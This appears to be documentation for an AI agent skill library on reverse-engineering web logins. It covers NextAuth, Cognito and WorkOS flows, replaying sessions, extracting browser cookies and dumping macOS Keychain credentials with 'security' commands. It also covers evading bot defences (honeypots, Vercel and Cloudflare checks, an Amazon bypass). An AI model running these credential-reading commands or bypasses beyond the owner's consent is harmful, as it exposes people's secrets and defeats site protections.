After the form submits, the browser lands on a new page. Check where you ended up (url) and grab the cookies (cookies { domain: "..." }). That’s all you need — the form POST did its job and set the session cookies.

Quick reference

Page load traffic?         → capture_network
Button click / async?      → Fetch interceptor
Nothing captured + URL changed? → Native form POST — inspect the <form>, then just grab the cookies after

Replaying with `agentos.http`

Once you understand what the browser does, replay it with agentos.http. The goal is to get the same cookies without a browser.

Skills use agentos.http for all HTTP — never raw httpx/requests/urllib. The http.headers() function builds the right header set for each request type, and the engine sets zero default headers — Python controls them all.

Form POSTs

from agentos import http

headers = http.headers(mode="navigate")  # browser-like headers for form POSTs
with http.client(headers=headers) as client:
    resp = client.post("https://auth.example.com/api/auth/login", data={
        "email": email,
        "password": password,
        "csrfToken": csrf_token,
    })
    session_cookies = dict(client.cookies)

http.client() follows redirects by default and handles the redirect chain automatically — same as the browser. The cookies accumulate on the client.

Fetch/XHR calls

from agentos import http

headers = http.headers(accept="json")  # API-appropriate headers
with http.client(headers=headers) as client:
    resp = client.post("https://api.example.com/auth/login", json={
        "email": email, "password": password
    })
    token = resp.json()["token"]

`http.headers()` knobs

The http.headers() function replaces the old profile= parameter. It builds headers from explicit knobs — the engine sets nothing by default:

Knob	What it does	Example
`waf=`	Anti-bot headers (User-Agent, client hints)	`http.headers(waf="cloudflare")`
`accept=`	Accept header type	`http.headers(accept="json")`, `http.headers(accept="html")`
`mode=`	Fetch mode / navigation headers	`http.headers(mode="navigate")`
`extra=`	Additional headers to merge	`http.headers(extra={"X-Custom": "val"})`

These compose: http.headers(waf="cloudflare", accept="json", mode="cors").

When replay doesn’t work

Sometimes the server does something specific to browser requests that agentos.http can’t replicate (custom redirect handling, Cloudflare challenges, JS-dependent cookie setting). When that happens:

Use Playwright for that step. Let the browser handle it.
Extract the cookies from Playwright after.
Use agentos.http for everything else (dashboard APIs, data extraction, etc.)

This isn’t a workaround — it’s the right architecture. Playwright handles the login, agentos.http handles the work. Each tool does what it’s good at.

Situation	Solution
Standard form POST or API call	`agentos.http` replay
Custom OTP/code verification	Scan JS bundles for custom endpoints → `agentos.http` replay (see discovery)
Google OAuth consent screen	Playwright first login → cookies → `agentos.http` after
Cloudflare JS challenge	Playwright or `brave-browser.cookie_get` for `cf_clearance`
Vercel Security Checkpoint (`429`)	`http.client(http2=False)` — purely a JA4 fingerprint issue
CAPTCHA	Cookies from user’s real browser session
Unknown client-side token construction	Navigation API interceptor → read the actual URL (see discovery)

The fastest way to do authenticated discovery. When the user is already logged into a site in Brave/Firefox, skip the login flow entirely — extract cookies from their real browser and inject them into Playwright or agentos.http.

The pattern

# 1. Get decrypted cookies from the user's browser
brave-browser.cookie_get({ domain: "goodreads.com" })
# → returns { cookies: [{name, value, domain, path, httpOnly, secure, ...}], count: 13 }

# 2a. Inject into Playwright for visual discovery
playwright.capture_network({
  url: "https://www.goodreads.com/friend/find_friend",
  cookies: [
    { name: "_session_id2", value: "443a469...", domain: "www.goodreads.com", path: "/" },
    { name: "at-main", value: "Atza|gQCkt...", domain: ".goodreads.com", path: "/" },
    ...
  ],
  pattern: "**friend**",
  wait: 5000
})
# → page loads authenticated, you can inspect/interact

# 2b. OR use http.client(cookies=...) for direct calls
from agentos import http
client = http.client(cookies={"_session_id2": "443a469...", "at-main": "Atza|gQCkt..."})

Why this matters

No login flow needed. The user is already logged in. Don’t waste time reverse-engineering auth when you just need to see what a page looks like.
Real session state. You get the exact cookies the browser has — including HttpOnly cookies, auth tokens, and CSRF state that would be hard to reproduce.
Playwright stays authenticated. After injecting cookies into capture_network or goto, the Playwright browser session keeps them. Subsequent click, fill, inspect calls stay logged in.

When making multi-step requests (e.g., fetch a form page, then submit it), use http.client(cookies=...) instead of a raw Cookie header:

from agentos import http

# WRONG — raw header doesn't track Set-Cookie responses
client = http.client(headers={"Cookie": cookie_header})
# Step 1 may set a new _session_id2, but step 2 sends the OLD one

# RIGHT — cookie jar tracks Set-Cookie automatically
client = http.client(cookies={"_session_id2": "abc123", "at-main": "Atza|..."})
# Step 1's Set-Cookie is carried to step 2

This is critical when CSRF tokens (like Goodreads’ n= param) are tied to the session cookie. If step 1 refreshes the session cookie but step 2 sends the stale one, the server silently ignores the request.

Provider	Tool	Notes
`brave-browser`	`cookie_get({ domain: "..." })`	Decrypts from Brave’s encrypted cookie DB
`firefox`	`cookie_get({ domain: "..." })`	Reads from Firefox profile
`playwright`	`cookie_get({ domain: "..." })`	From Playwright’s own browser session (after login)

Working with Playwright

Practical notes for using the Playwright skill during discovery.

Use `type`, not `fill`, for React forms

React manages input state through synthetic events. fill sets the DOM value directly, bypassing React — the component state stays empty and submit buttons stay disabled. type sends real keystrokes that trigger onChange handlers.

# React form — use type
type { selector: "input[type=email]", text: "user@example.com" }

# Plain HTML form — either works
fill { selector: "input[type=email]", value: "user@example.com" }

If the submit button is disabled after entering text, you probably need type.

Watch for honeypot fields

Some login forms have hidden inputs designed to catch bots:

<input name="website" type="text" style="display:none">

These are invisible to users but bots that fill every field get caught. In HTTPX replay, never include these fields. Common names: website, url, homepage, company, fax.

If your HTTPX replay silently fails (200 response but nothing happens), check for honeypot fields you might be filling.

Navigate to dashboard, not auth

Always start at the dashboard URL. The auth domain needs the callbackUrl parameter (set by the dashboard redirect) to know where to send you after login. Going to auth directly often shows “accessed incorrectly” errors.

Clearing state for a fresh run

clear_cookies { domain: ".example.com" }

Useful when existing cookies skip you past the login page and you need to observe the full flow from scratch.

Auth patterns

NextAuth.js / Auth.js

The most common pattern for Next.js dashboards. Recognized by /api/auth/* endpoints and next-auth.* cookies.

Quick identification:

GET /api/auth/csrf returns a CSRF token
GET /api/auth/providers lists available login methods
Session cookie: next-auth.session-token (encrypted JWT, ~30 day expiry)

Email login flow (fully HTTPX for custom OTP sites):

GET /api/auth/csrf → CSRF token (HTTPX)
POST /api/auth/signin/email → triggers email (HTTPX)
POST /api/verify-otp → verify code, get token components (HTTPX)
GET /api/auth/callback/email?token=... → session cookie set (HTTPX)

The key insight: many NextAuth sites with custom OTP code entry have a hidden /api/verify-otp endpoint discoverable via JS bundle scanning. The callback token format (hashedOtp:rawOtp) was discovered using the Navigation API interceptor. See nextauth.md for the full deep dive. Reference implementation: skills/exa/.

AWS Cognito

Common in gym/fitness SaaS (Approach, Mindbody, etc.). Pure AWS API calls — no browser needed at all.

from agentos import http

headers = http.headers(extra={
    "X-Amz-Target": "AWSCognitoIdentityProviderService.InitiateAuth",
    "Content-Type": "application/x-amz-json-1.1",
})
with http.client(headers=headers) as client:
    resp = client.post(
        "https://cognito-idp.us-east-1.amazonaws.com/",
        content=json.dumps({
            "AuthFlow": "USER_PASSWORD_AUTH",
            "ClientId": client_id,
            "AuthParameters": {"USERNAME": email, "PASSWORD": password},
        }).encode(),
    )
tokens = resp.json()["AuthenticationResult"]
# Use tokens["AccessToken"] as Bearer token

Find the ClientId in the app’s JS bundle — search for userPoolId or userPoolClientId.

WorkOS

B2B auth platform. Supports SSO, social login, and email. Recognized by workos_id in JWT claims.

See workos.md for the full deep dive.

For any site that uses session cookies without a framework like NextAuth:

Walk through the login in Playwright
Extract cookies: cookies { domain: ".example.com" }
Use them with http.client(cookies={...})

Reference implementations:

skills/claude/claude-login.py (Cloudflare-protected)
skills/amazon/amazon.py (tiered cookie architecture, Siege bypass)

Large services like Amazon use multiple cookie tiers for different access levels:

Tier	Cookies	Access
Session	`session-id`, `session-token`, `ubid-main`	Browsing, search
Persistence	`x-main`	“Remember me” across sessions
Authentication	`at-main` (`Atza\|...`), `sess-at-main`	Account pages, order history
SSO	`sst-main` (`Sst1\|...`), `sso-state-main`	Cross-service auth

When building a skill against a tiered service, you need the full cookie jar from a logged-in browser — not just the session cookie. The auth tokens are interdependent and the server validates them together.

Some cookies should be excluded (see 1-transport for cookie stripping) — encryption trigger cookies, WAF telemetry, etc. But the auth-tier cookies must all be present.

Auth boundaries

Not every operation needs a login. During discovery, classify each endpoint:

Tier	Description	Example
Public	Works with just a frontend API key	Goodreads search, Exa search API
Suggested auth	Richer results with a session, but works without	Goodreads reviews (adds `viewerHasLiked`)
Required auth	Fails without session cookies	Dashboard APIs, mutations, user-specific data

To map boundaries: send each request without auth. If you get data, it’s public. If you get partial data with errors on some fields, it’s suggested auth. If you get a 401/403 or an auth error, it’s required.

In the skill manifest, mark public operations with auth: none:

operations:
  search:         # public — no cookies
    auth: none
  get_api_keys:   # requires dashboard session
    connection: dashboard

Runtime config discovery

Some services rotate API keys or endpoints when they deploy. For these, build a multi-tier discovery chain that self-heals:

Tier 1: Cache           instant, works until config rotates
Tier 2: Bundle extract  1-2s, parse the JS bundle for config
Tier 3: Browser capture 10-15s, load the page and capture network
Tier 4: Hardcoded       instant, but may be stale

Note: File-based caching has been replaced by sandbox storage — the executor reads/writes cache vals on the skill’s graph node. See spec/sandbox-storage.md.

Implementation

def discover_runtime(**kwargs) -> dict:
    cached = _load_cache()
    if cached:
        return cached

    config = discover_from_bundle(kwargs.get("html_text"))
    if config:
        _save_cache(config)
        return config

    config = discover_via_browser(kwargs.get("page_url"))
    if config:
        _save_cache(config)
        return config

    return {"endpoint": FALLBACK_ENDPOINT, "api_key": FALLBACK_API_KEY}

Multi-environment bundles

Production JS bundles often ship configs for all environments. Pick Prod:

Signal	Example
`shortName` field	`"shortName": "Prod"`
Ads enabled	`"showAds": true`
Analytics enabled	`"publishWebVitalMetrics": true`

Reference: skills/goodreads/public_graph.py discover_from_bundle().

Examples

Skill	Pattern	What to learn from it
`skills/amazon/`	Tiered cookie auth, Siege encryption bypass, `SESSION_EXPIRED` retry	Full client hints, cookie stripping for anti-bot, session warming, provider retry convention
`skills/exa/`	NextAuth email code → fully HTTPX (no browser) → API keys	JS bundle scanning for custom endpoints, Navigation API interception, OTP token format discovery, Vercel `http2=False` bypass
`skills/goodreads/`	Multi-tier discovery, AppSync, auth boundary mapping	Bundle extraction, config rotation, public vs auth operations
`skills/claude/`	Cloudflare-protected cookie extraction	Stealth Playwright settings, HttpOnly cookies via CDP
`skills/austin-boulder-project/`	Bundle-extracted API key, tenant namespace	JS config scanning, namespace-as-auth

Vendor guides

Guide	When to read it
nextauth.md	Sites with `/api/auth/` endpoints, `next-auth.` cookies
workos.md	Sites with `workos_id` in JWT claims, WorkOS session IDs
macos-keychain.md	Native macOS apps, Electron Safe Storage, Google OAuth tokens, full credential audit

NextAuth.js (Auth.js) Pattern

NextAuth.js (rebranded to Auth.js) is the most popular auth library for Next.js apps. Many SaaS dashboards use it for email login, Google SSO, and enterprise auth (via WorkOS or similar). Understanding its conventions accelerates reverse engineering because the endpoint structure, cookie names, and flow mechanics are predictable.

Part of Layer 3: Auth & Runtime. Discovered during the Exa skill reverse engineering session.

Recognizing NextAuth

Any of these signals indicate NextAuth:

Signal	Example
Auth endpoints at `/api/auth/*`	`/api/auth/csrf`, `/api/auth/providers`, `/api/auth/session`
CSRF cookie	`__Host-next-auth.csrf-token` (value is `token%7Chash`)
Callback URL cookie	`__Secure-next-auth.callback-url`
Session cookie	`next-auth.session-token` (JWT, HttpOnly, ~30 day expiry)
Separate auth subdomain	`auth.example.com` with redirects to `dashboard.example.com`
Provider list endpoint	`GET /api/auth/providers` returns JSON with provider configs

Quick probe

capture_network { url: "https://auth.example.com", pattern: "**/api/auth/**", wait: 3000 }

If you see /api/auth/csrf and /api/auth/providers in the capture, it’s NextAuth.

Provider discovery

evaluate { script: "fetch('/api/auth/providers').then(r=>r.json()).then(d=>JSON.stringify(d))" }

Returns something like:

{
  "email": { "id": "email", "name": "Email", "type": "email", "signinUrl": "/api/auth/signin/email" },
  "google": { "id": "google", "name": "Google", "type": "oauth", "signinUrl": "/api/auth/signin/google" },
  "workos": { "id": "workos", "name": "WorkOS", "type": "oauth", "signinUrl": "/api/auth/signin/workos" }
}

This tells you exactly which login methods are available before you try anything.

Endpoint map

All endpoints live under the auth domain’s /api/auth/ prefix.

Endpoint	Method	Purpose
`/api/auth/csrf`	GET	Returns `{ csrfToken: "..." }` and sets the CSRF cookie
`/api/auth/providers`	GET	Lists available auth providers with their signin URLs
`/api/auth/signin/email`	POST	Triggers verification code/link email
`/api/auth/signin/google`	POST	Initiates Google OAuth redirect
`/api/auth/callback/email`	GET/POST	Handles email verification callback
`/api/auth/callback/google`	GET	Handles Google OAuth callback
`/api/auth/session`	GET	Returns current session (user info, expiry)
`/api/auth/signout`	POST	Destroys session

CSRF token

Every mutating request requires the CSRF token, obtained from /api/auth/csrf:

resp = client.get(f"{AUTH_BASE}/api/auth/csrf")
csrf_token = resp.json()["csrfToken"]

The response also sets a __Host-next-auth.csrf-token cookie. The value is token%7Chash — the token and a hash separated by | (URL-encoded as %7C). Both the cookie and the csrfToken field in the POST body must match.

Email verification flow

NextAuth’s email provider sends a verification code (or sometimes a magic link, depending on the site’s configuration). The standard flow:

Step 1: Trigger the email (HTTPX-compatible)

csrf_token = _get_csrf_token(client)

client.post(
    f"{AUTH_BASE}/api/auth/signin/email",
    data={
        "email": email,
        "csrfToken": csrf_token,
        "callbackUrl": "https://dashboard.example.com/",
        "json": "true",
    },
    headers={"Content-Type": "application/x-www-form-urlencoded"},
)

This sends the verification email. The response is typically { "url": "..." } pointing to a “check your email” page.

Step 2: Code/token submission

Standard NextAuth uses a magic link that hits:

GET /api/auth/callback/email?callbackUrl=...&token=TOKEN&email=EMAIL

Where TOKEN is the raw verification token. NextAuth hashes it as SHA256(token + NEXTAUTH_SECRET) and compares with the stored hash.

Custom OTP implementations (e.g. Exa) display a 6-digit code entry page instead of a magic link. These typically have a custom verification endpoint:

POST /api/verify-otp
Body: {"email": "user@example.com", "otp": "123456"}
→ {"email": "...", "hashedOtp": "$2a$10$...", "rawOtp": "123456"}

The client-side JS then constructs the NextAuth callback token from the response and redirects to the standard callback:

GET /api/auth/callback/email?token=HASHED_OTP:RAW_OTP&email=EMAIL&callbackUrl=...

The token format is {hashedOtp}:{rawOtp} — bcrypt hash, colon, raw code. This is fully replayable via HTTPX. No browser needed.

Discovery playbook for custom OTP flows

When the standard NextAuth callback fails with error=Verification, the site has a custom OTP layer. Follow these steps to crack it:

Step A: Scan JS bundles for custom endpoints

# Search terms that reveal custom auth endpoints
scan_bundles(auth_url, [
    "verify-otp", "verify-code", "confirm-code",     # custom verification
    "callback/email", "hashedOtp", "rawOtp",          # token construction
    "fetch(", "/api/",                                 # general API calls
])

Look for fetch("/api/verify-...") calls in the bundle context. The surrounding code usually reveals the request shape and response handling.

Step B: Read the library source

Check what the server expects. For NextAuth, the key file is callback/index.ts. The email handler does createHash(token + secret) — this tells you the token parameter must match what the server originally stored.

Step C: Intercept the client-side token construction

If the bundle shows the endpoint but the token construction is complex or spread across minified closures, use the Navigation API interceptor:

evaluate { script: "navigation.addEventListener('navigate', (e) => { window.__intercepted_nav_url = e.destination.url; e.preventDefault(); }); 'interceptor installed'" }

Then trigger the action:

click { selector: "button:text-is('VERIFY CODE')" }
evaluate { script: "window.__intercepted_nav_url" }

The captured URL will contain the fully-assembled token, e.g.:

https://auth.exa.ai/api/auth/callback/email?token=$2a$10$...%3A123456&email=...

URL-decode it and the format is obvious: {bcrypt_hash}:{raw_otp}.

Step D: Replay with HTTPX

Now you know the full flow — reproduce it with HTTPX:

POST /api/verify-otp with {email, otp} → get {hashedOtp, rawOtp}
Construct token = f"{hashedOtp}:{rawOtp}"
GET /api/auth/callback/email?token=...&email=... → session cookie

See Discovery: JS Bundle Scanning and Discovery: Navigation API Interception for the general techniques.

Step 3: Session establishment

After successful verification (either path), the server sets the next-auth.session-token cookie and redirects to the callback URL.

Validate the session:

resp = client.get(f"{DASHBOARD_BASE}/api/auth/session")
session = resp.json()
# { "user": { "email": "...", "id": "...", "teams": [...] }, "expires": "..." }

Cookie	Domain	HttpOnly	Secure	SameSite	Expiry	Purpose
`__Host-next-auth.csrf-token`	auth domain	Yes	Yes	Lax	Session	CSRF double-submit
`__Secure-next-auth.callback-url`	auth domain	Yes	Yes	Lax	Session	Where to redirect after auth
`next-auth.session-token`	`.parent-domain`	Yes	Yes	Lax	~30 days	JWT session (the important one)

Cross-domain note: The session token is typically scoped to the parent domain (e.g. .exa.ai) so it works across both auth.exa.ai and dashboard.exa.ai. The CSRF and callback cookies are scoped to the auth subdomain only.

For HTTPX replay, you only need next-auth.session-token for authenticated API calls. The CSRF and callback cookies are only needed during the login flow itself.

Session token (JWT)

The next-auth.session-token is an encrypted JWT (JWE with A256GCM). You can’t decode it without the server’s secret — but you don’t need to. Just pass it as a cookie to authenticated endpoints.

# Use http2=False for Vercel-hosted dashboards (Security Checkpoint blocks h2)
# Use http2=True for other hosts (CloudFront, plain Cloudflare, etc.)
with httpx.Client(
    http2=False,  # adjust per host — see 1-transport
    follow_redirects=True,
    cookies={"next-auth.session-token": session_token},
) as client:
    resp = client.get(f"{DASHBOARD_BASE}/api/get-api-keys")

The server decodes the JWT server-side and returns the session info via /api/auth/session. See Transport: http2 selection for how to determine the right setting per host.

Gotchas

Auth subdomain vs dashboard domain

Many NextAuth sites separate auth and dashboard onto different subdomains. Navigate to the dashboard domain (e.g. https://dashboard.exa.ai), not the auth domain directly. The dashboard redirects to auth with the correct callbackUrl parameter. Going to auth directly often shows “accessed incorrectly” errors because the callback URL is missing.

Honeypot fields

Some NextAuth login forms include hidden honeypot fields (e.g. input[name="website"]). Never fill these in HTTPX replay. See Playwright Discovery Gotchas for details.

React forms need `type` not `fill`

NextAuth login pages built with React/Next.js require Playwright’s type command (real keystrokes) rather than fill (direct DOM manipulation). fill bypasses React’s synthetic event system and leaves form state empty. See Playwright Discovery Gotchas.

Vercel Security Checkpoint

Many NextAuth dashboards are hosted on Vercel. Vercel’s Security Checkpoint blocks httpx(http2=True) outright — returning 429 with a JS challenge page regardless of cookies or headers. The fix is httpx(http2=False).

This is purely a JA4 TLS fingerprint issue. httpx’s h2 fingerprint is well-known to Vercel’s bot detection. h1 is less distinctive and passes. See Layer 1: Transport for the full analysis.

Not every Vercel subdomain enables the checkpoint. Test each one — during Exa reverse engineering, auth.exa.ai accepted h2 while dashboard.exa.ai rejected it. The checkpoint is a per-project Vercel Firewall setting.

Cloudflare protection

Some NextAuth sites sit behind Cloudflare (separate from Vercel’s layer) and set a cf_clearance cookie after a JS challenge. cf_clearance is bound to the client’s TLS fingerprint and IP — it only works from the same fingerprint that solved the challenge.

In practice, for Vercel-hosted dashboards the http2=False fix is sufficient and cf_clearance isn’t needed. Store it if available (it’s cheap insurance), but don’t depend on it for HTTPX access.

Dashboard API patterns

Once authenticated, NextAuth dashboards typically expose REST APIs under /api/. These are standard Next.js API routes — no special auth headers needed, just the session cookie.

Common patterns discovered during reverse engineering:

Endpoint pattern	What it returns
`/api/auth/session`	User profile, team memberships, feature flags
`/api/get-api-keys`	API keys (may include full values!)
`/api/get-teams`	Team info, rate limits, billing, usage
`/api/create-api-key`	Creates a new key (POST, JSON body)
`/api/service-api-keys?teamId=`	Service-level keys (separate from user keys)

Always check raw API responses. Dashboard UIs routinely mask sensitive values (API keys, tokens) client-side, but the underlying API returns them in full. During reverse engineering, use capture_network on authenticated pages and read the complete JSON response bodies.

See Dashboard APIs leak more than the UI for the general pattern.

Real-world example: Exa

Exa (dashboard.exa.ai / auth.exa.ai) is the reference implementation for this pattern in the agentOS skill library. The entire email login flow is browser-free — every step uses HTTPX.

Architecture:

Auth domain: auth.exa.ai (NextAuth.js, Vercel-hosted)
Dashboard domain: dashboard.exa.ai (Vercel-hosted, Security Checkpoint enabled)
Providers: email, google, workos
Email verification: 6-digit OTP code (custom /api/verify-otp endpoint)
Session: encrypted JWT in next-auth.session-token on .exa.ai
Transport: httpx(http2=False) for dashboard (Vercel checkpoint blocks h2)

Skill operations:

send_login_code — triggers verification email via HTTPX
verify_login_code — verifies OTP code, constructs token, completes login (fully HTTPX)
store_session_cookies — fallback for Google SSO (Playwright cookies)
get_api_keys — lists keys (full values in id field) via HTTPX
get_teams — team info, rate limits, credits via HTTPX
create_api_key — creates a new key via HTTPX

Key findings:

The id field in /api/get-api-keys is the full API key value (UUID format). The dashboard masks it, but the API returns it unmasked.
The custom OTP endpoint (POST /api/verify-otp) was found via JS bundle scanning — it doesn’t appear in any NextAuth documentation.
The callback token format (hashedOtp:rawOtp) was discovered using the Navigation API interceptor in Playwright, then replayed entirely with HTTPX.

How it was reverse-engineered (summary):

Identify framework: GET /api/auth/providers → NextAuth
Try standard flow: POST /api/auth/signin/email → sends code OK; GET /api/auth/callback/email?token=CODE → error=Verification (6-digit code isn’t the raw token NextAuth expects)
Scan JS bundles: search for verify-otp, callback/email, fetch( → found POST /api/verify-otp accepting {email, otp} returning {hashedOtp, rawOtp}
Read library source: NextAuth’s callback/index.ts shows the server does SHA256(token + secret) — so the token must be the pre-hash value
Intercept with Navigation API: inject navigation.addEventListener, click “VERIFY CODE”, capture the destination URL → token format is {hashedOtp}:{rawOtp} (bcrypt hash, colon, raw OTP)
Replay with HTTPX: POST /api/verify-otp → construct token → GET /api/auth/callback/email?token=... → session cookie set

See skills/exa/exa.py and skills/exa/readme.md for the full implementation.

Comparison with WorkOS

Aspect	NextAuth	WorkOS
Where it lives	In the app (Next.js API routes)	External auth service
JWT decoding	Encrypted (JWE), opaque	Standard JWT, decodable
Session storage	Cookie-based (JWT in cookie)	Cookie or token-based
Token refresh	Automatic via session cookie	Explicit refresh token flow
Identification	`/api/auth/` routes, `next-auth.` cookies	`workos` in JWT `iss`, `workos_id` claim
Multi-tenant	App-specific	Built-in organization/team support

See WorkOS Auth Pattern for the WorkOS-specific methodology.

WorkOS Auth Pattern

WorkOS is a B2B auth platform used by many SaaS and desktop apps. It started as an enterprise SSO product (SAML, SCIM) but added WorkOS User Management in 2023 — a full-stack auth system covering consumer sign-up, social login, and enterprise SSO in one package.

Part of Layer 3: Auth & Runtime. See also Electron deep dive for how WorkOS tokens are stored in Electron apps.

Recognizing WorkOS

The JWT iss (issuer) claim will contain workos or point to a custom auth domain backed by WorkOS:

{
  "iss": "https://auth.granola.ai/user_management/client_01JZJ0X...",
  "workos_id": "user_01K2JVZM...",
  "external_id": "c3b1fa46-...",
  "sid": "session_01KH4JGG...",
  "sign_in_method": "CrossAppAuth"
}

Key claims:

Claim	Meaning
`workos_id`	WorkOS-native user ID (`user_01...`)
`external_id`	Previous auth provider’s user UUID (preserved on migration)
`sid`	WorkOS session ID (`session_01...`)
`sign_in_method`	How the session was created: `SSO`, `Password`, `GoogleOAuth`, `CrossAppAuth`
`iss`	Contains `/user_management/client_<id>` for WorkOS User Management

Token File Shape

Apps that store WorkOS tokens locally typically use one of these shapes:

Post-migration (Supabase → WorkOS)

{
  "workos_tokens": "{\"access_token\":\"eyJ...\",\"refresh_token\":\"...\",\"expires_in\":21599,\"obtained_at\":1234567890,\"session_id\":\"session_01...\",\"external_id\":\"uuid\",\"sign_in_method\":\"CrossAppAuth\"}",
  "session_id": "session_01...",
  "user_info": "{\"id\":\"uuid\",\"email\":\"...\"}"
}

Note: workos_tokens is a JSON string (double-encoded), not an object.

import json

with open("supabase.json") as f:
    raw = json.load(f)

tokens = json.loads(raw["workos_tokens"])   # parse the inner string
access_token  = tokens["access_token"]
refresh_token = tokens["refresh_token"]
expires_in    = tokens["expires_in"]        # seconds
obtained_at   = tokens["obtained_at"]       # ms epoch

Native WorkOS storage

Some apps store tokens more directly:

{
  "access_token": "eyJ...",
  "refresh_token": "...",
  "token_type": "Bearer",
  "expires_in": 3600
}

Token Lifecycle

WorkOS access tokens are short-lived (typically 6 hours / 21600s).

import time, json, base64

def is_expired(token: str, buffer_s: int = 300) -> bool:
    payload = token.split('.')[1]
    payload += '=' * (4 - len(payload) % 4)
    claims = json.loads(base64.urlsafe_b64decode(payload))
    return claims['exp'] < time.time() + buffer_s

def get_token(token_file: str) -> str:
    with open(token_file) as f:
        raw = json.load(f)
    tokens = json.loads(raw.get("workos_tokens", "{}")) or raw
    access = tokens["access_token"]
    if is_expired(access):
        # Option A: open the app to refresh  
        # Option B: call the WorkOS refresh endpoint directly
        raise ValueError("Token expired — open the app to refresh")
    return access

Refreshing without the app

If you have the refresh_token and client_id, you can refresh directly:

import httpx, json

def refresh_workos_token(refresh_token: str, client_id: str, auth_domain: str) -> dict:
    """auth_domain e.g. 'https://auth.granola.ai'"""
    resp = httpx.post(f"{auth_domain}/user_management/authenticate", json={
        "client_id":     client_id,
        "grant_type":    "refresh_token",
        "refresh_token": refresh_token,
    })
    resp.raise_for_status()
    return resp.json()

The client_id is embedded in the iss claim: https://auth.example.com/user_management/client_01JZJ0X... → client_01JZJ0X...

Calling the API

WorkOS-protected APIs expect a standard Bearer token plus usually some app-specific identity headers. Always check the bundle for custom headers before assuming a 401 is a token problem:

import json, httpx
from pathlib import Path

TOKEN_FILE = Path.home() / "Library/Application Support/AppName/supabase.json"

def get_headers() -> dict:
    with open(TOKEN_FILE) as f:
        raw = json.load(f)
    tokens = json.loads(raw["workos_tokens"])
    return {
        "Authorization": f"Bearer {tokens['access_token']}",
        "X-Client-Version": "1.0.0",       # from app package.json
        "X-Client-Platform": "darwin",
        # Add X-Workspace-Id, X-Device-Id etc. if the app sends them
    }

with httpx.Client(http2=True) as client:
    resp = client.post("https://api.example.com/v1/some-endpoint",
        json={"param": "value"},
        headers=get_headers())
    print(resp.json())

Supabase → WorkOS Migration

Many companies migrated from Supabase Auth to WorkOS. Signs you’ve hit a migrated app:

Token file named supabase.json but contains workos_tokens key
JWT has both workos_id and external_id (the old Supabase UUID)
iss points to a custom domain (not supabase.co)
Database tables still use the old Supabase UUID as primary key

The migration preserves the old UUID as external_id precisely so FK constraints don’t need to be updated.

Why migrate? Supabase Auth is great for consumer apps; WorkOS adds enterprise SSO (SAML/OIDC), SCIM directory sync, and an admin portal. B2B SaaS companies migrate when enterprise customers demand SSO.

Common migration path:

Supabase Auth → WorkOS User Management → (optionally) full WorkOS SSO

Competitors in this space: Clerk (more consumer/Next.js focused), Auth0 (enterprise, heavyweight), Stytch (developer-first).

macOS Keychain — Credential Audit & Token Extraction

The macOS Keychain is where native apps store OAuth tokens, API keys, session credentials, and encryption keys. For skill development, it’s the primary source for credentials held by desktop apps (Mimestream, Cursor, GitHub CLI, etc.).

What the Keychain Actually Contains

Running a full Keychain dump reveals the complete credential landscape of a machine:

security dump-keychain 2>/dev/null | grep '"svce"\|"acct"'

What you’ll find falls into predictable categories:

1. Native app OAuth tokens

Apps that do their own OAuth login store per-account tokens under a service name that identifies the app and account:

"svce" = "Mimestream: user@example.com"
"acct" = "OAuth"

security find-generic-password -s "Mimestream: user@example.com" -a "OAuth" -w returns a binary plist containing access_token, refresh_token, expires_in, client_id, and token_url. This is exactly what mimestream.credential_get reads.

2. Electron “Safe Storage” encryption keys

Every Chromium-based app (Brave, Chrome, Cursor, Slack, Discord, VS Code, etc.) stores a single master key in the Keychain:

"svce" = "Brave Safe Storage"
"svce" = "Cursor Safe Storage"
"svce" = "Slack Safe Storage"
"svce" = "discord Safe Storage"

This key encrypts everything the app stores locally — saved passwords, OAuth tokens, session cookies, localStorage. The encrypted data lives in:

~/Library/Application Support/<AppName>/
  Local Storage/leveldb/    ← encrypted
  Cookies                   ← SQLite, values encrypted
  Login Data                ← Chromium password manager

To read any of those, you need the Safe Storage key first. The key is not guarded by an ACL in most cases — any process running as the same user can read it silently without prompting.

3. CLI tool OAuth tokens

"svce" = "gh:github.com"
"acct" = "username"

The GitHub CLI (gh) stores OAuth tokens here, one entry per account. security find-generic-password -s "gh:github.com" -a "username" -w returns the token directly.

4. API keys stored by apps

Some apps store their API keys directly:

"acct" = "raycast_ai_anthropic_apikey"
"acct" = "raycast_ai_openRouterAPIKey"
"acct" = "search_tavily_BLoLA9AB"

These are direct string values — no OAuth, no structure. One security call returns the key.

5. App session tokens

"svce" = "cursor-access-token"
"svce" = "cursor-refresh-token"
"acct" = "cursor-user"

SaaS desktop apps that use their own auth (not Electron’s Safe Storage pattern) store session tokens directly as named items.

6. Password manager infrastructure (1Password)

"svce" = "1Password:domain-key-acls"
"svce" = "1Password:device-unlock-ask-again-after"

1Password stores its internal device unlock keys and domain key ACL mappings in the Keychain. These are protected — 1Password sets proper ACLs on its items so other processes can’t read them silently. This is the exception; most apps don’t bother with ACLs.

Three Google OAuth Patterns on macOS

Not all Google-authorized apps look the same locally. When you check myaccount.google.com/permissions, the entries come from three distinct mechanisms — each with different detection methods and different local traces.

Pattern 1: Native PKCE apps (Info.plist URL scheme)

Apps like Mimestream, BusyContacts, and Strongbox embed a Google client ID directly in their app bundle. They register a reversed client ID as a URL scheme in Info.plist — this is how Google redirects the auth code back to the app after the user approves.

com.googleusercontent.apps.1064022179695-5793e1qdeuvrmvi5bfgg3rcv3aj62nfb

Reverse it to get the client ID:

1064022179695-5793e1qdeuvrmvi5bfgg3rcv3aj62nfb.apps.googleusercontent.com

These are “public clients” — the client ID is public by design. What protects the user is PKCE during login and the refresh token afterward (see sections below).

Detection: Scan Info.plist URL schemes for googleusercontent.apps.

Where to scan: Apps install in multiple locations — scanning only /Applications/*.app misses a lot:

# All common install locations
for dir in /Applications /Applications/Setapp ~/Applications /System/Applications; do
    [ -d "$dir" ] || continue
    for app in "$dir"/*.app; do
        result=$(plutil -p "$app/Contents/Info.plist" 2>/dev/null | grep "googleusercontent")
        [ -n "$result" ] && echo "$(basename $app .app) ($dir): $result"
    done
done

Real-world example: BusyContacts and Strongbox are Setapp apps — they live in /Applications/Setapp/ and are invisible to a top-level-only scan.

Local traces:

Info.plist URL scheme (always present while installed)
Keychain entry with per-account OAuth tokens (e.g. "svce" = "Mimestream: user@example.com")

Pattern 2: macOS Internet Accounts (Account.framework)

